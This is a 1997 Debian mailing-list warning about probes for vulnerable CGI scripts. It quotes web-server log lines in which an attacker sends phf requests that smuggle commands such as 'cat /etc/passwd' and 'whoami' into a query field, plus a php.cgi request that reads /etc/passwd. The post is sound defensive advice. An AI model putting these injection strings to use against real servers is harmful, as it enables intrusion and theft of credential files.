WEB SECURITY: fyi!!
I just want leave a note to all people running web servers on thier
debian machines. Check your cgi-bin dir for the following files:
test-cgi
nph-test-cgi
phf
php.cgi?
I have looked up information on these cgi's and they are old software
code that people can use to grap passwd files and such. Someone tried to
attack me the other day using these:
sl29.burgoyne.com - - [20/Apr/1997:12:46:00 -0400] "GET
/cgi-bin/test-cgi?*" 404-
sl29.burgoyne.com - - [20/Apr/1997:12:46:01 -0400] "GET
/cgi-bin/nph-test-cgi?*" 404 -
sl29.burgoyne.com - - [20/Apr/1997:12:46:03 -0400] "GET
/cgi-bin/phf?Qname=j-shaman.phf.scanner%0Aid%0Awhoami%0A" 404 -
sl29.burgoyne.com - - [20/Apr/1997:12:46:04 -0400] "GET
/cgi-bin/phf?Qname=
j-shaman.phf.scanner%0Acat%20/etc/passwd%0Aypcat%20passwd%0A" 404 -
sl29.burgoyne.com - - [20/Apr/1997:12:46:05 -0400] "GET
/cgi-bin/php.cgi?/etc/passwd" 404 -
Luckily I have been good on staying on top of my software, so the hacker
received "404 not found" I suggest everyone check for these files and
check your http logs if you have older versions of web servers.
Dennis
====================================================================
+ dpk <dpk@egr.msu.edu> + work : 517.353.8892 +
+ Systems Undergrad + pager: 517.222.5875 +
+ Division of Engineering Computing Services + Quote me +
====================================================================
--
TO UNSUBSCRIBE FROM THIS MAILING LIST: e-mail the word "unsubscribe" to
debian-user-request@lists.debian.org .
Trouble? e-mail to templin@bucknell.edu .
Reply to: